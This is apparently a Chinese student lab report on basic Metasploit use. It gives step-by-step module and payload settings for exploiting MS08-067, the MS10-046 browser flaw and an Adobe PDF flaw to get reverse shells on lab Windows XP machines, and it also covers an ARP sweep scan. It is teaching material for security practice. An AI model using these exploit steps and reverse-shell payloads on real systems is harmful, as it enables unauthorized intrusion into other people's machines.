zoukankan      html  css  js  c++  java

  • 20155208徐子涵 Exp5 MSF基础应用

    20155208徐子涵 Exp5 MSF基础应用

    基础问题回答

    用自己的话解释什么是exploit,payload,encode.

    • Exploit:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞,所以说exploit和漏洞就是紧密相关的。

    • Payload:payload属于名词意思有:有效载荷,而在网络攻防这一领域,他也可以说成是有效攻击载荷,相当于是将shellcode进行执行。

    • Encode:encode的意思就是编码,主要是将后门等程序进行处理从而实现免杀等效果。

    实践开始

    实践一

    MS08-067远程溢出漏洞攻击

    • 首先打开msfconsole界面,指令就是简单的msfconsole

    • 然后进行检索,使用指令search ms08_067 来对漏洞可以运用的攻击模块进行查询:

    • 然后对所查询的攻击模块进行观察,看我们要使用哪一种攻击模块,这次我们选择使用exploit/windows/smb/ms08_067_netapi
      使用show payload可以查看我们使用的有效攻击载荷:

    • 然后我们对所选取的payload进行设置,指令为set payload generic/shell_reverse_tcp ,然后show options查看设置状态:

    这里要注意,我们需要设置RHOST和LHOST,一个是靶机的IP地址,另一个是攻击机的IP地址,设置成功:

    • 然后就是最紧张刺激的时刻,开始攻击exploit,好的,一次性成功,获取主机的shell,这下我们可以为所欲为了,那就看一下靶机系统信息,使用指令systeminfo:

    • OK,成功完成。

    实践二

    对浏览器攻击:ms10_046漏洞攻击

    • 开始的步骤总是那么的相似,打开平台,对攻击模块进行检索:

    • 这次我们选择使用的是exploit/windows/browser/ms10_046_shortcut_icon_dllloader
      查看show payload:

    • 这里我们所选择的payload是windows/meterpreter/reverse_tcp
      并进行设置,先用show options查看所需要设置的参数:

    • 与上一个实践不同的是:SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

    • 设置成功后,我们打开xp系统的IE浏览器,打开链接:http://192.168.88.134:80/:

    • 此时kali显示接入一个会话:

    • 使用 sessions -i 2 选择会话2(因为第一次IP地址输错了,所以不是会话1,而是会话2),成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:

    • OK,第二个实践大功告成。

    实践三

    对Adobe的漏洞攻击

    • 真的不想再重复上面那句话了,可是又有什么办法呢,还是要先打开平台检索和adobe漏洞有关的攻击模块啊:

    • 这次选择exploit/windows/fileformat/adobe_cooltype_sing,然后查看payload:

    • 选择windows/meterpreter/reverse_tcp 来攻击,并使用show options查看所需要设置的参数:

    • 这个好哎,只需要设置主机IP就可以,设置成功后直接开始输入exploit,发现产生了一个pdf文件:

    • 找到这一文件(刚开始还没找到,后来发现这个文件被隐藏了,设置显示隐藏文件就可以看到了):

    • 然后将文件拷到靶机中,设置主机IP及端口,输入exploit开始攻击,另一方面,在靶机中打开pdf文件,发现成功获取靶机shell:

    实践四

    ARP攻击

    msf > use auxiliary/scanner/discovery/arp_sweep 
然后
set RHOSTS 192.168.108.0-192.168.108.255
然后 exploit进行攻击

    • 这个时候我们发现我们找到了192.168.88.130这一IP地址,这个就是我们想要找的靶机:

    • 可以发现NTP网络时间协议服务器,它是用来同步各个计算机的时间的协议用的

    实践五

    辅助模块的应用

    • 首先使用 show auxiliary 查看可以运用的辅助模块:

    • 这里我们选择ARP扫描,使用命令:use scanner/discovery/arp_sweep ,并使用show options查看参数:

    • 发现只需要设置主机的IP就可以

    • 使用exploit指令开始扫描,成功扫描到靶机的smb版本:

    实验总结与体会

    通过这次的实验,我们充分利用了msf这一平台,不过msf也仅仅只是一个品台,有很多攻击都不能通过其来实现,比如我们如果把靶机换成windows7或者以上版本的系统时,我们就很难攻击成功,所以如果我们还想在这一方面更进一步的话,我们就要多研究多琢磨,看看还有什么好的平台或者软件、漏洞才会更接近攻击的实现。

    离实战还缺些什么技术或步骤?

    我觉得距离实战还有不少的距离,我们要做到攻击就要绕过防火墙,而这次的实验整体都是关闭了防火墙来做的,还有就是怎么才能做到让靶机顺其自然的打开建立连接的文件,这都是值得思考的而问题。
  • 相关阅读:
    java多线程调试
    nginx学习网站收录
    eclispe使用
    网站收集
    《TCP/IP详解卷1:协议》——第6章 ICMP:Internet控制报文协议(转载)
    深入理解计算机系统——第12章:用信号量同步线程
    《TCP/IP详解卷1:协议》——第5章 RARP:逆地址解析协议(转载)
    YYHS-Floor it(递推+矩阵乘法+快速幂)
    YYHS-数列
    (转)Tarjan应用
  • 原文地址:https://www.cnblogs.com/xuzihan/p/8933541.html
Copyright © 2011-2022 走看看